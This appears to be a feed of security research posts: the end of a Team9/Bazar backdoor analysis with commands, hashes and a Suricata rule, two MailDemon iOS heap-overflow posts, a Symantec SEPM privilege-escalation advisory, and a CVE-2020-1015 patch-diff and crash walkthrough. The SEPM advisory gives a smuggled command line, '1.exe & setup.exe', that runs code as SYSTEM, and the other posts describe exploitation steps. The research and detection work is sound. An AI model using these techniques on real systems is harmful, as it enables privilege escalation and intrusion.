The backdoor appears to support network communication over ports 80 (HTTP) and 443(HTTPS). In recent samples, a certificate is issued from the infected host for communication over HTTPS. Each request to the command and control server includes at least the following information:

  1. A URI path for requesting tasks (/2) or sending results (/3).
  2. Group ID. This is added in the ‘Cookie’ header.

Lastly, unlike the loader which decrypts received network replies from the command and control server using the host’s date as the key, the Team9 backdoor uses the bot ID as the key.

4.2 Bot commands

The backdoor supports a variety of commands. These are summarised in the table below.

Command ID Description Parameters
0 Set delay time for the command and control server requests
  • Time to delay the requests
1 Collect infected host information
  •  Memory buffer to fill in the collected data
10 Download file from an address and inject into a process using either hollowing process injection or Doppelgänging process injection
  • DWORD value that represents the corresponding execution method. This includes:
    • Process hollowing injection
    • Process Doppelgänging injection
    • Write the file into disk and execute it
  • Process mask – DWORD value that represents the process name to inject the payload. This can be one of the following:
    1. Explorer
    2. Cmd
    3. Calc (Not used in all variants)
    4. Svchost
    5. notepad
  • Address from which the file is downloaded
  • Command line
11 Download a DLL file and execute it
  • Timeout value
  • Address to download the DLL
  • Command line
  • Timeout time
12 Execute a batch file received from the command and control server
  • DWORD value to determine if the batch script is to be stored into a Windows pipe (run from memory) or in a file into disk
  • Timeout value.
  • Batch file content
13 Execute a PowerShell script received from the command and control server
  • DWORD value to determine if the PowerShell script is to be stored into a Windows pipe (run from memory) or in a file into disk
  • Timeout value.
  • PowerShell script content
14 Reports back to the command and control server and terminates any handled tasks None
15 Terminate a process
  • PID of the process to terminate
16 Upload a file to the command and control server. Note: Each variant of the backdoor has a set file size they can handle.
  • Path of the file to read and upload to the command and control server.
100 Remove itself None

Table 6 – Supported backdoor commands

Table 7 summarises the report structure of each command when it reports back (POST request) to the command and control server. Note: In a few samples, the backdoor reports the results to an additional IP address (185.64.106[.]73) If it cannot communicate with the Bazar domains.

Command ID/Description Command execution results structure
1/ Collect infected host information The POST request includes the following information:
  • Operating system information
  • Operating system architecture
  • NETBIOS name of the infected host
  • Username of the infected user
  • Backdoor’s file path
  • Infected host time zone
  • Processes list
  • Keyboard language
  • Antivirus name and installed applications
  • Infected host’s external IP
  • Shared drives
  • Shared drives in the domain
  • Trust domains
  • Infected host administrators
  • Domain admins
11/ Download a DLL file and execute it The POST request includes the following parameters:
  • Command execution errors (Passed in the parameter ‘err’)
  • Process identifier (Passed in the ‘pid’ parameter)
  • Command execution output (Passed in the parameter ‘stdout’, if any)
  • Additional information from the command execution (Passed in the parameter ‘msg’, if any)
12/ Execute a batch file received from the command and control server Same as the previous command (11/ Download a DLL file and execute it)
13/ Execute a PowerShell script received from the command and control server Same as the previous command (11/ Download a DLL file and execute it)
14/ Reports back to the command and control server and terminate any handled tasks POST request with the string ‘ok’
15/ Terminate a process Same as the previous command (11/ Download a DLL file and execute it)
16/ Upload a file to the command and control server No parameters. The file’s content is sent in a POST request.
100/ Remove itself POST request with the string ‘ok’ or ‘process termination error’

Table 7 – Report structure

5. Appendix

5.1 struct shortcut_bin

struct shortcut_bin 

BYTE junk_data[434];
BYTE file_path[520];
BYTE filepath_dir[520];
BYTE file_loader_parameters[1024];

5.2 IOCs

File hashes

Description SHA-256 Hash
Team9 backdoor (x64) 4F258184D5462F64C3A752EC25FB5C193352C34206022C0755E48774592B7707
Team9 backdoor (x64) B10DCEC77E00B1F9B1F2E8E327A536987CA84BCB6B0C7327C292F87ED603837D
Team9 backdoor (x64) 363B6E0BC8873A6A522FE9485C7D8B4CBCFFA1DA61787930341F94557487C5A8
Team9 backdoor (x64) F4A5FE23E21B6B7D63FA2D2C96A4BC4A34B40FD40A921B237A50A5976FE16001
Team9 backdoor (x64) A0D0CFA8BF0BC5B8F769D8B64EAB22D308B108DD8A4D59872946D69C3F8C58A5
Team9 backdoor (x64) 059519E03772D6EEEA9498625AE8B8B7CF2F01FC8179CA5D33D6BCF29D07C9F4
Team9 backdoor (x64) 0F94B77892F22D0A0E7095B985F30B5EDBE17AB5B8D41F798EF0C708709636F4
Team9 backdoor (x64) 2F0F0956628D7787C62F892E1BD9EDDA8B4C478CF8F1E65851052C7AD493DC28
Team9 backdoor (x64) 37D713860D529CBE4EAB958419FFD7EBB3DC53BB6909F8BD360ADAA84700FAF2
Team9 backdoor (x64) 3400A7DF9EC3DC8283D5AC7ACCB6935691E93FEDA066CC46C6C04D67F7F87B2B
Team9 backdoor (x64) 5974D938BC3BBFC69F68C979A6DC9C412970FC527500735385C33377AB30373A
Team9 backdoor (x64) C55F8979995DF82555D66F6B197B0FBCB8FE30B431FF9760DEAE6927A584B9E3
Team9 backdoor (x86) 94DCAA51E792D1FA266CAE508C2C62A2CA45B94E2FDFBCA7EA126B6CD7BC5B21
Team9 backdoor (x86) 4EE0857D475E67945AF2C5E04BE4DEC3D6D3EB7C78700F007A7FF6F8C14D4CB3
Team9 backdoor (x86) 8F552E9CA2BEDD90CE9935A665758D5DE2E86B6FDA32D98918534A8A5881F91A
Team9 backdoor (x86) AE7DAA7CE3188CCFE4069BA14C486631EEA9505B7A107A17DDEE29061B0EDE99
Team9 backdoor (x86) F3C6D7309F00CC7009BEA4BE6128F0AF2EA6B87AB7A687D14092F85CCD35C1F5
Team9 backdoor (x86) 6CBF7795618FB5472C5277000D1C1DE92B77724D77873B88AF3819E431251F00
Team9 backdoor (x86) B0B758E680E652144A78A7DDECC027D4868C1DC3D8D7D611EC4D3798358B0CE5
Team9 backdoor (x86) 959BA7923992386ABF2E27357164672F29AAC17DDD4EE1A8AD4C691A1C566568
Team9 backdoor (x86) 3FE61D87C9454554B0CE9101F95E18ABAD8AC6C62DCC88DC651DDFB20568E060
Team9 loader (x64) B3764EF42D526A1AE1A4C3B0FE198F35C6BC5C07D5F155D15060B94F8F6DC695
Team9 loader (x64) 210C51AAB6FC6C52326ECE9DBD3DDAB5F58E98432EF70C46936672C79542FBD0
Team9 loader (x64) 11B5ADAEFD04FFDACEB9539F95647B1F51AEC2117D71ECE061F15A2621F1ECE9
Team9 loader (x64) 534D60392E0202B24D3FDAF992F299EF1AF1FB5EFEF0096DD835FE5C4E30B0FA
Team9 loader (x64) 9D3A265688C1A098DD37FE77C139442A8EB02011DA81972CEDDC0CF4730F67CF
Team9 loader (x64) CE478FDBD03573076394AC0275F0F7027F44A62A306E378FE52BEB0658D0B273
Team9 loader (x64) 5A888D05804D06190F7FC408BEDE9DA0423678C8F6ECA37ECCE83791DE4DF83D
Team9 loader (x64) EB62AD35C613A73B0BD28C1779ACE80E2BA587A7F8DBFEC16CF5BF520CAA71EE
Team9 loader (x64) A76426E269A2DEFABCF7AEF9486FF521C6110B64952267CFE3B77039D1414A41
Team9 loader (x64) 65CDBDD03391744BE87AC8189E6CD105485AB754FED0B069A1378DCA3E819F28
Team9 loader (x64) 38C9C3800DEA2761B7FAEC078E4BBD2794B93A251513B3F683AE166D7F186D19
Team9 loader (x64) 8F8673E6C6353187DBB460088ADC3099C2F35AD868966B257AFA1DF782E48875
Team9 loader (x86) 35B3FE2331A4A7D83D203E75ECE5189B7D6D06AF4ABAC8906348C0720B6278A4
Team9 loader (x86) 65E44FC8527204E88E38AB320B3E82694D1548639565FDAEE53B7E0F963D3A92
Team9 loader (x86) F53509AF91159C3432C6FAF4B4BE2AE741A20ADA05406F9D4E9DDBD48C91EBF9
Team9 loader (x86) 73339C130BB0FAAD27C852F925AA1A487EADF45DF667DB543F913DB73080CD5D
Team9 loader (x86) 2342C736572AB7448EF8DA2540CDBF0BAE72625E41DAB8FFF58866413854CA5C
Team9 loader (x86) 079A99B696CC984375D7A3228232C44153A167C1936C604ED553AC7BE91DD982
Team9 loader (x86) 0D8AEACF4EBF227BA7412F8F057A8CDDC54021846092B635C8D674B2E28052C6
Team9 loader (x86) F83A815CE0457B50321706957C23CE8875318CFE5A6F983A0D0C580EBE359295
Team9 loader (x86) 3FA209CD62BACC0C2737A832E5F0D5FD1D874BE94A206A29B3A10FA60CEB187D
Team9 loader (x86) 05ABD7F33DE873E9630F9E4F02DBD0CBC16DD254F305FC8F636DAFBA02A549B3

Table 8 – File hashes

Identified Emercoin domains


Table 9 – Identified Emercoin domains

Command and Control IPs


Table 10 – Command and Control IPs

Identified DNS IPs


Table 11 – Identified DNS IPs


Component Mutex name
Team9 backdoor mn_185445
Team9 backdoor {589b7a4a-3776-4e82-8e7d-435471a6c03c}
Team9 loader ld_201127

Table 12 – Mutex names Team9 components

Host IOCs

  1. Files ending with the string ‘_lyrt’
  2. Scheduled tasks with names ‘StartAT’ and ‘StartDT’
  3. Shortcut with file name ‘adobe’ in the Windows ‘StartUp’ folder
  4. Registry value name ‘BackUp Mgr’ in the ‘Run’ registry key

Network detection

alert dns $HOME_NET any -> any 53 (msg:”FOX-SRT – Suspicious – Team9 Emercoin DNS Query Observed”; dns_query; content:”.bazar”; nocase; dns_query; pcre:”/(newgame|thegame|portgame|workrepair|realfish|eventmoult|bestgame|forgame|zirabuo)\.bazar/i”; threshold:type limit, track by_src, count 1, seconds 3600; classtype:trojan-activity; metadata:created_at 2020-05-28; metadata:ids suricata; sid:21003029; rev:3;)



Hidden demons? MailDemon Patch Analysis: iOS 13.4.5 Beta vs. iOS 13.5

24 May 2020 at 08:30
Hidden demons? MailDemon Patch Analysis: iOS 13.4.5 Beta vs. iOS 13.5

Summary and TL;DR

Further to Apple’s patch of the MailDemon vulnerability (see our blog here), ZecOps Research Team has analyzed and compared the MailDemon patches of iOS 13.4.5 beta and iOS 13.5. 

Our analysis concluded  that the patches are different, and that iOS 13.4.5 beta patch was incomplete and could be still vulnerable under certain circumstances. 

Since the 13.4.5 beta patch was insufficient, Apple issued a complete patch utilising a different approach which fixed this issue completely on both iOS 13.5 and iOS 12.4.7 as a special security update for older devices. 

This may explain why it took about one month for a full patch to be released. 

iOS 13.4.5 beta patch

The following is the heap-overflow vulnerability patch on iOS 13.4.5 beta.  

The function  -[MFMutableData appendBytes:length:] raises an exception if  -[MFMutableData _mapMutableData] returns false.

In order to see when -[MFMutableData _mapMutableData] returns false, let’s take a look at how it is implemented:

When mmap fails it returns False, but still allocates a 8-bytes chunk and stores the pointer in self->bytes. This patch raises an exception before copying data into self->bytes, which solves the heap overflow issue partially.

 -[MFMutableData appendData:]
 +--  -[MFMutableData appendBytes:length:] **<-patch**
    +-- -[MFMutableData _mapMutableData]

The patch makes sure an exception will be raised inside -[MFMutableData appendBytes:length:]. However, there are other functions that call -[MFMutableData _mapMutableData] and interact with self->bytes which will be an 8-bytes chunk if mmap fails, these functions do not check if mmap fails or not since the patch only affects -[MFMutableData appendBytes:length:].

Following is an actual backtrace taken from MobileMail:

 * frame #0: 0x000000022a0fd018 MIME`-[MFMutableData _mapMutableData:]
    frame #1: 0x000000022a0fc2cc MIME`-[MFMutableData bytes] + 108
    frame #2: 0x000000022a0fc314 MIME`-[MFMutableData mutableBytes] + 52
    frame #3: 0x000000022a0f091c MIME`_MappedAllocatorAllocate + 76
    frame #4: 0x0000000218cd4e9c CoreFoundation`_CFRuntimeCreateInstance + 324
    frame #5: 0x0000000218cee5c4 CoreFoundation`__CFStringCreateImmutableFunnel3 + 1908
    frame #6: 0x0000000218ceeb04 CoreFoundation`CFStringCreateWithBytes + 44
    frame #7: 0x000000022a0eab94 MIME`_MFCreateStringWithBytes + 80
    frame #8: 0x000000022a0eb3a8 MIME`_filter_checkASCII + 84
    frame #9: 0x000000022a0ea7b4 MIME`MFCreateStringWithBytes + 136
-[MFMutableData mutableBytes]
+--  -[MFMutableData bytes]
   +--  -[MFMutableData _mapMutableData:]

Since the bytes returned by mutableBytes is usually considered to be modifiable given following from Apple’s documentation:

This property is similar to, but different than the bytes property. The bytes property contains a pointer to a constant. You can use The bytes pointer to read the data managed by the data object, but you cannot modify that data. However, if the mutableBytes property contains a non-null pointer, this pointer points to mutable data. You can use the mutableBytes pointer to modify the data managed by the data object.

Apple’s documentation

Both -[MFMutableData mutableBytes] and -[MFMutableData bytes] returns self->bytes points to the 8-bytes chunk if mmap fails, which might lead to heap overflow under some circumstances.

The following is an example of how things could go wrong, the heap overflow still would happen even if it checks length before memcpy:

size_t length = 0x30000;
MFMutableData* mdata = [MFMutableData alloc];
data = malloc(length);
[mdata initWithBytesNoCopy:data length:length];    
size_t mdata_len = [mdata length];
char* mbytes = [mdata mutableBytes];//mbytes could be a 8-bytes chunk
size_t new_data_len = 90;
char* new_data = malloc(new_data_len);
if (new_data_len <= mdata_len) {
    memcpy(mbytes, new_data, new_data_len);//heap overflow if mmap fails

iOS 13.5 Patch

Following the iOS 13.5 patch, an exception is raised in “-[MFMutableData _mapMutableData] ”, right after mmap fails and it doesn’t return the 8-bytes chunk anymore. This approach fixes the issue completely.


iOS 13.5 patch is the correct way to patch the heap overflow vulnerability. It is important to double check security patches and verify that the patch is complete. 

At ZecOps we help developers to find security weaknesses, and validate if the issue was correctly solved automatically. If you would like to find similar vulnerabilities in your applications/programs, we are now adding additional users to our CrashOps SDK beta program
If you do not own an app, and would like to inspect your phone for suspicious activity – check out ZecOps iOS DFIR solution – Gluon.

Symantec Endpoint Protection Manager (SEPM) 14.2 RU2 MP1 Elevation of Privileges (CVE-2020-5835)

By: admin
19 May 2020 at 06:43


Assigned CVE: CVE-2020-5835 has been assigned and RedyOps Labs has been publicly acknowledged by the vendor.

Known to Neurosoft’s RedyOps Labs since: 16/03/2020

Vendor’s Advisory:

An Elevation of Privilege (EoP) exists in SEPM 14.2 RU2 MP1. The latest version we tested is SEPM Version 14 (14.2 RU2 MP1) build 5569 (14.2.5569.2100). The exploitation of this EoP , gives the ability to a low privileged user to execute any file as SYSTEM . The exploitation can take place the moment where a remote installation of the SEP is happening. The attacker escalates privileges, not in the machine which has the SEPM installed, but in the machine which we are going to remotely push (install) the SEP in. The attacker controls the file vpremote.dat which is used in order to provide the command line for the execution of the setup. By altering the command line, the attacker can execute any chosen file. Moreover, the installation uses the C:\TEMP folder, which the user fully controls and thus further attacks with symlinks seem to be possible.


Whenever Symantec Endpoint Protection Manager (SEPM) performs a client installation with remote push (Symantec Endpoint Protection Manager->Clients->Install a Client->Next->Next->Remote Push), the following actions are happening:

  1. By providing the credentials of a user who has Administrative rights on the remote machine (local Administrator, Domain Admin, etc), the SEPM connects to the remote system in order to install the client.
  2. In the remote system, the folder c:\TEMP\Clt-Inst\ is being created and a variety of actions are being performed as SYSTEM. 

Any user with low privileges has full access in the new folders which are being created under the C:\ drive, by default. Any single user can create any folder under the C:\ drive . The inherited permissions allow him and everyone else, to edit/add/remove any file or sub folders, thus any user has full access on subfolders/files under the c:\TEMP folder.

As long as many file operations are being performed as SYSTEM, it seems possible for a user with low privileges to perform a variety of attacks with symlinks, such as Arbitrary file Creations, Arbitrary Deletes and more. These attacks are well documented, so I am not going to use any of those attacks for this blog post. 

In order to present the issue, I am going to escalate my privileges from a user with low privileges and gain access as NT AUTHORITY/SYSTEM. This will be accomplished by modifying the vpremote.dat which is being created to the victim machine, in which we try to install the SEP with “remote push”. I remind that this machine is not necessarily the one which has the SEPM installed and usually is a new machine in which we try install the SEP client for first time.

During the installation process, the file vpremote.dat contains the command line which is going to be executed, probably by the vpremote.exe. This command line, instructs the execution of the setup.exe .By modifying the vpremote.dat, we can instruct the execution of our executable.
In order for this to succeed, we create a vpremote.dat with the following contents:

1.exe & setup.exe 

and we add our executable 1.exe , in the same folder. The 1.exe is irrelevant to the vulnerability. It’s only the file you want to execute as SYSTEM. 


No special exploit is need.

In the following paragraph a step by step explanation of the Video PoC, is provided.

Video PoC Step By Step

00:00-00:49: The Symantec Endpoint Manager Administrator, wants to install the SEP client on a the machine . In this time frame, we watch the non malicious SEP Manager Administrator, who opts to install the client to the machine

00:50-end: This is the view of the machine The SEPM Administrator, from the previous machine, is trying to install the SEP Client on this machine ( ).
An attacker with low privilege access, has compromised the machine . The attacker at this point has no access to the SEP Manager, or to the Administrator’s password for this machine ( . He only has low privilege access as user “attacker” on this machine (

01:15-01:19: As we can see, the folder C:\Temp\Clt-Inst\ is created and some files are added to this folder. One of the files is the vpremote.dat .

01:24-01:25: We replace the vpremote.dat with our vpremote.dat, which contains the payload “1.exe & setup.exe” and we add to the folder our malicious binary 1.exe .
The file 1.exe is irrelevant. You can use any binary you like. In case you will opt to use your own binary, you may not see the window because it is being executed from the session of the system user. You can observe the process creation from the procmon or you can validate that your 1.exe has been executed, from the Task Manager.

02:06-end: The 1.exe has been executed and the cmd.exe has opened as SYSTEM. My application 1.exe, opens the cmd.exe in the attacker’s session, and this is why it is visible. If you choose your own binary (e.g the notepad.exe) it might not be visible, but you can see it running in the task manager.



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RedyOps team

RedyOps team, uses the 0-day exploits produced by Research Labs, before vendor releases any patch. They use it in special engagements and only for specific customers.

You can find RedyOps team at


Discovered 0-days which affect marine sector, are being contacted with the Angel Team. ANGEL has been designed and developed to meet the unique and diverse requirements of the merchant marine sector. It secures the vessel’s business, IoT and crew networks by providing oversight, security threat alerting and control of the vessel’s entire network.

You can find Angel team at


Our 0-days cannot win Illicium. Today’s information technology landscape is threatened by modern adversary security attacks, including 0-day exploits, polymorphic malwares, APTs and targeted attacks. These threats cannot be identified and mitigated using classic detection and prevention technologies; they can mimic valid user activity, do not have a signature, and do not occur in patterns. In response to attackers’ evolution, defenders now have a new kind of weapon in their arsenal: Deception.

You can find Illicium team at


Discovered 0-days are being contacted to the Neutrify team, in order to develop related detection rules. Neutrify is Neurosoft’s 24×7 Security Operations Center, completely dedicated to threats monitoring and attacks detection. Beyond just monitoring, Neutrify offers additional capabilities including advanced forensic analysis and malware reverse engineering to analyze incidents.

You can find Neutrify team at

The post Symantec Endpoint Protection Manager (SEPM) 14.2 RU2 MP1 Elevation of Privileges (CVE-2020-5835) appeared first on REDYOPS Labs.

A tale of a kiosk escape: ‘Sricam CMS’ Stack Buffer Overflow

By: voidsec
13 May 2020 at 15:24

TL;DR: Shenzhen Sricctv Technology Sricam CMS (SricamPC.exe) <= v. and DeviceViewer (DeviceViewer.exe) <= v. (CVE-2019-11563) are affected by a local Stack Buffer Overflow. By creating a specially crafted “Username” and copying its value in the “User/mail” login field, an attacker will be able to gain arbitrary code execution in the context of the currently logged-in […]

The post A tale of a kiosk escape: ‘Sricam CMS’ Stack Buffer Overflow appeared first on VoidSec.

CVE-2020-1015 Analysis

12 May 2020 at 14:00

This post is an analysis of the April 2020 security patch for CVE-2020-1015. The bug was reported by Shefang Zhong and Yuki Chen of the Qihoo 360 Vulcan team. The description of the bug from Microsoft:

An elevation of privilege vulnerability exists in the way that the User-Mode Power Service (UMPS) handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.

Microsoft assigned this bug an exploitability rating of 2. Information pulled from the Microsoft Exploitability Index shows this means an attacker would likely have difficulty creating the code, requiring expertise and/or sophisticated timing, and/or varied results when targeting the affected product.

This bug is likely not the most ideal candidate for a fully functioning and reliable exploit. Especially when taking in consideration other EoPs from the April 2020 security patches with an exploitability rating of 1. In any case, it will be interesting to see why the exploitability rating was assigned, and the root cause of the bug.

The remainder of this post will follow the steps I took to analyze the security patch and put together simple proof of concept code for a working crash.

Patch Diffing Windows 10 1903 umpo.dll

To get started we will first need to grab a patched and non-patched version of the relevant file. While not a foolproof method, search engining “User-Mode Power Service file” points us to umpo.dll. We will focus our efforts on the changes in this dll. A patched version can be grabbed by downloading and extracting the .dll from the relevant KB or from an updated Windows 10 system. The non-patched version can be grabbed from a Windows 10 system prior to updating it with April’s updates.

To perform the patch diff I will use Diaphora. Diaphora shows that two functions have been modified UmpoRpcLegacyEventRegisterNotification and UmpoNotifyRegister:

image 1

A third function, UmpoNotifyUnregister, is unmatched and has been removed from the patched version of umpo.dll.

image 2

Reading these modified function names sounds like the vulnerability could be a use after free.

Modified Functions Analysis

Now that the modified functions are known it is time to start reviewing them to identify the bug. Quickly looking at both modified functions reveals that they are not very long. To get an idea of how the functions are called we will check the cross references to each function. There are no cross references from another function to UmpoRpcLegacyEventRegisterNotification. Based on the name it is likely invoked via an RPC call. UmpoNotifyRegister however has one:

image 3


We will delve deeper into UmpoRpcLegacyEventRegisterNotification. I prefer to do dynamic analysis whenever possible, so we will fire up WinDbg and put a breakpoint on the target function:

image 4

The function declaration:

__int64 UmpoRpcLegacyEventRegisterNotification(__int64 a1, 
                                               __int64 a2, 
                                               const wchar_t *a3, 
                                               int a4)

Since this is likely an RPC call (which we will verify later) we will assume the first argument is the RPC binding handle and ignore it. The arguments appear pretty straightforward:

image 5

a3 is a wchar_t which in this case is a service name. a2 is some value that does not point to valid memory so is likely utilized as some constant or identifier. a4 is 0. We will keep track of a4 and see what other potential values it could be. The first section of interesting code marked up with comments is:

  v14 = 0i64;
  v4 = a4;
  v5 = a3;
  v6 = a2;

  // Return if not local client (local RPC only)
  if ( !(unsigned int)UmpoIsClientLocal() )
    return 5i64;

  // Get some object
  v7 = UmpoGetSettingEntry();
  // If not NULL
  if ( v7 )
    // Get another object at v7+32
    v8 = (__int64 *)(v7 + 32);
    // Walk circular linked list until back at head
    for ( i = *v8; (__int64 *)i != v8; i = *(_QWORD *)i )
      // Breaks if object offset 20 == 1 and
      // if object offset 24 == a2
      if ( *(_DWORD *)(i + 20) == 1 && *(_QWORD *)(i + 24) == v6 )
        goto LABEL_11;
    // If not found set i to 0
    i = 0i64;
    // If found within circular linked list set v14 to object pointer
    v14 = i;

A reference to an object is obtained by calling UmpoGetSettingEntry(). This object contains a pointer to another object at offset 32. This object appears to be a circularly linked list that is walked in a loop. If the object member at offset 24 is equal to a3 and the object member at offset 20 is equal to 1 the loop breaks.

The second section of interesting code is:

  // if a4
  if ( v4 )
   // if section 1 code loop does not find anything i is 0
    if ( !i )
      return 0i64;
    // otherwise unregister
    result = UmpoNotifyUnregister(i);
  // if a4 == 0 (our current case)
    if ( i )
      return 0i64;
    // Get sessionID of service
    v10 = WTSGetServiceSessionId();
    // call UmpoNotifyRegister
    result = UmpoNotifyRegister(v12, v11, v10, v6, v5, &v14);

This section reveals the purpose of a4. If a4 is non-zero UmpoNotifyUnregister is called with the address returned from the section one code loop. If a4 is 0 UmpoNotifyRegister is called. For documentation purposes we can reduce this function to:

__int64 UmpoRpcLegacyEventRegisterNotification(
   // RPC Binding Handle
   __int64 a1, 
   // Handle
   __int64 a2, 
   // Service Name
   const wchar_t *a3, 
   // 0 to Register 1 to Unregister
   int a4)


This brings us to the second modified function UmpoNotifyRegister. This function is a bit longer than the previous, but still relatively short. Less relevant sections will be omitted. From our work done reversing the last function we already have a good idea of the arguments:

__int64 __fastcall UmpoNotifyRegister(
    // Set to 0 
    // Set to 0 
    __int64 a2, 
    // SessionID
    int a3, 
    // Handle
    __int64 a4, 
    // Service Name
    const wchar_t *pszSrca, 
    // Reference to return to calling function? 
    __int64 *a6)

The first interesting section of the second target function:

  v6 = a4;
  v7 = a3;
  v8 = 0;

  if ( service_name )
    v9 = service_name;
    v10 = 256i64;
    // walk through string until null char is encountered
    // or 256 characters are read
      if ( !*v9 )
    while ( v10 );
    // v11 set to error code if error if str len > 256
    v11 = v10 == 0 ? 0x80070057 : 0;
    if ( v10 )
      // v12 set to length of string
      v12 = 256 - v10;
      v12 = 0i64;
    v12 = 0i64;
    v11 = -2147024809;

EnterCriticalSection is called to synchronize shared access to an object. Then service_name (which is our service name argument) is walked until a null character is encountered to determine the length of the string.

The second section is the bulk of the function. This function allocates space for a struct that we will call registrant (r for short in the code comments). It turns out that this struct makes up the circular linked list (actually a doubly circular linked list) walked in the for loop in section one of the first function analyzed. The function then populates the new object with the relevant data from our function call arguments, and inserts the object into the front of the list. The struct is defined (rust syntax) as:

struct registrant {
    // pointer to next
    next: usize,
    // pointer to prev
    prev: usize,
    // set to 1 after alloc
    count: u32, 
    // Flags
    flags: u32, 
    // handle we pass
    handle: usize, 
    // heap alloc which is size of service_name + 2 for null char
    service_name: usize,
    // sessionID
    session_id: u32,
    // unknown, might be two u16s
    unknown: u32,

With the above struct definition the below code should be relatively straight forward to follow:

 // if no error on service_name length check
 if ( !v11 )
    v13 = (_QWORD *)UmpoGetSettingEntry();
    v11 = 8;
    // allocate registrant struct memory 48 bytes
    v14 = RtlAllocateHeap(UmpoHeapHandle, 8i64, 48i64);
    v15 = v14;

    // error case on alloc
    if ( !v14 )
      goto LABEL_20;

    v16 = UmpoHeapHandle;
    // r->count is set to 1
    *(_DWORD *)(v14 + 16) = 1;
    // r->prev is set to itself
    *(_QWORD *)(v14 + 8) = v14;
    // r->next is set to itself
    *(_QWORD *)v14 = v14;
    // allocate memory for r->service_name
    v17 = (wchar_t *)RtlAllocateHeap(v16, 8i64, (unsigned int)(2 * v12 + 2));
    // set r->service_name pointer to allocated memory
    *(_QWORD *)(v15 + 32) = v17;

    // error case on alloc
    if ( !v17 )
      if ( v15 )
        UmpoDereferenceRegistrant((__int64 *)v15);
      if ( v13 && v8 )
        RtlFreeHeap(UmpoHeapHandle, 0i64);
      goto LABEL_21;

    // set r->flags set to 1
    *(_DWORD *)(v15 + 20) = 1;
    // set r->handle to a4 (handle)
    *(_QWORD *)(v15 + 24) = v6;
    // copy func arg service_name into r->service_name
    StringCchCopyW(v17, v12 + 1, pszSrca);
    // umpo!UmpoNotifyRegister+0x111: lea rax, [rsi+20h] 
    v18 = v13 + 4;
    // set r->session_id
    *(_DWORD *)(v15 + 40) = v7;
    // v19 = settingEntry head->next
    v19 = v13[4];
    // check if linked list head->next->prev == head  
    if ( *(_QWORD **)(v19 + 8) == v13 + 4 )
      // inserting at head of list  
      // set r->next to head->next
      *(_QWORD *)v15 = v19;
      // set r->prev to head
      *(_QWORD *)(v15 + 8) = v18;
      // set head->next->prev to r
      *(_QWORD *)(v19 + 8) = v15;
      // set head->next to r
      *v18 = v15;
      // set r+44 to 0
      *(_BYTE *)(v15 + 44) = 0;


The final function change was the removal of UmpoNotifyUnregister. This function calls EnterCriticalSection and then UmpoDereferenceRegistrant. UmpoDereferenceRegistrant performs some error checks, removes the registrant struct from the doubly linked list and frees both heap allocations performed in UmpoNotifyRegister.

Bug Analysis

We now have a good understanding of the modified/removed functions. Let’s look at the April umpo.dll function changes to see if we can spot the security vulnerability. Solely looking at the Diaphora results it appears that there are quite a few modifications. However with our new understanding of the code, the modifications essentially boil down to one glaring change from a security perspective. EnterCriticalSection and LeaveCriticalSection have been moved from UmpoNotifyRegister to UmpoRpcLegacyEventRegisterNotification. Critical sections are used to synchronize simultaneous access to a shared object within a process. Errors in synchronizing access to shared data produces bugs. Conspicousouly, EnterCriticalSection is moved right above the call to UmpoGetSettingEntry (section one of first function analyzed).

At this point the bug is becoming apparent. UmpoGetSettingEntry returns a global variable which contains a pointer to the head of our doubly circular linked list of registrant objects. The non-patched code does not correctly synchronize access to this object. This error results in a race condition.

Race conditions are bugs, but in a sense are not directly exploitable. Rather, they provide a pathway to a security violation. Initially, the race must be won, which allows the security violation. The violation then must be taken advantage of. With this in mind, let’s think of how this race condition can be taken advantage of. As mentioned earlier, the names of the modified functions invokes the use after free vulnerability class. Following this line of thought, it is straightforward to imagine a scenario where the race condition results in a use after free. Take for example the following scenario with two threads:

Thread 1 enters UmpoRpcLegacyEventRegisterNotication.
Thread 1 accesses linked list registrant shared object.
Thread 1 obtains pointer to target registrant struct.
Thread 1 enters UmpoNotifyUnregister.
Thread 2 enters UmpoRpcLegacyEventRegisterNotication.
Thread 1 enters UmpoDereferenceRegistrant.
Thread 2 accesses linked list registrant shared object.
Thread 2 obtains pointer to target registrant struct.
Thread 1 frees registrant struct memory.

At this point the thread 2 pointer to the target registrant struct is dangling.

Exploitation PoC to Trigger Crash

To verify that the bug analysis is accurate we must write a simple PoC to trigger the race condition and use after free. Based on the name of UmpoRpcLegacyEventRegisterNotication we have previously assumed that this function is invoked via RPC. To verify this we will use the extremely useful tool NtObjectManager written by James Forshaw.

After importing the NtObjectManager module we can run the below command (more information on this tool here and here):

image 6

This provides all RPC functions we can call from umpo.dll. Reviewing the ouput we see our function:

HRESULT UmpoRpcLegacyEventRegisterNotification(
    /* Stack Offset: 0 */ handle_t p0, 
    /* Stack Offset: 8 */ [In] UIntPtr p0, 
    /* Stack Offset: 16 */ [In] /* FC_SUPPLEMENT FC_C_WSTRING Range(0, 256) */ 
    wchar_t* p1, 
    /* Stack Offset: 24 */ [In] int p2);

We will take all the output from the tool and use that to create our .idl file to make the RPC call. The crash PoC is very simple and the code is available here. The necessary RPC binding initialization is set up and two threads are started.

Thread one repeatedly registers a registrant struct. Thread two randomly flips between registering and unregistering. The service_name argument to UmpoRpcLegacyEventRegisterNotication is set up to be the same size heap allocation as the registrant struct itself (48 bytes) to populate the freed memory. After running the crash code for a bit we get a crash!

image 7

The crash occurs in UmpoRpcLegacyEventRegisterNotication referencing the invalid memory 41414141`41414155, which is our data.

Thanks to Shefang Zhong, Yuki Chen, and James Forshaw for providing tools and knowledge that greatly helped:


Seeing (Mail)Demons? Technique, Triggers, and a Bounty

9 May 2020 at 19:39
Seeing (Mail)Demons? Technique, Triggers, and a Bounty

Impact & Key Details (TL;DR)

  1. Demonstrate a way to do a basic heap spray
  2. We were able to use this technique to verify that this vulnerability is exploitable. We are still working on improving the success rate.
  3. Present two new examples of in-the-wild triggers so you can judge by yourself if these bugs worth an out of band patch
  4. Suggestions to Apple on how to improve forensics information / logs and important questions following Apple’s response to the previous disclosure
  5. Launching a bounty program for people who have traces of attacks with total bounties of $27,337
  6. MailDemon appears to be even more ancient than we initially thought. There is a trigger for this vulnerability, in the wild, 10 years ago, on iPhone 2g, iOS 3.1.3

Following our announcement of RCE vulnerabilities discovery in the default Mail application on iOS, we have been contacted by numerous individuals who suspect they were targeted by this and related vulnerabilities in Mail.

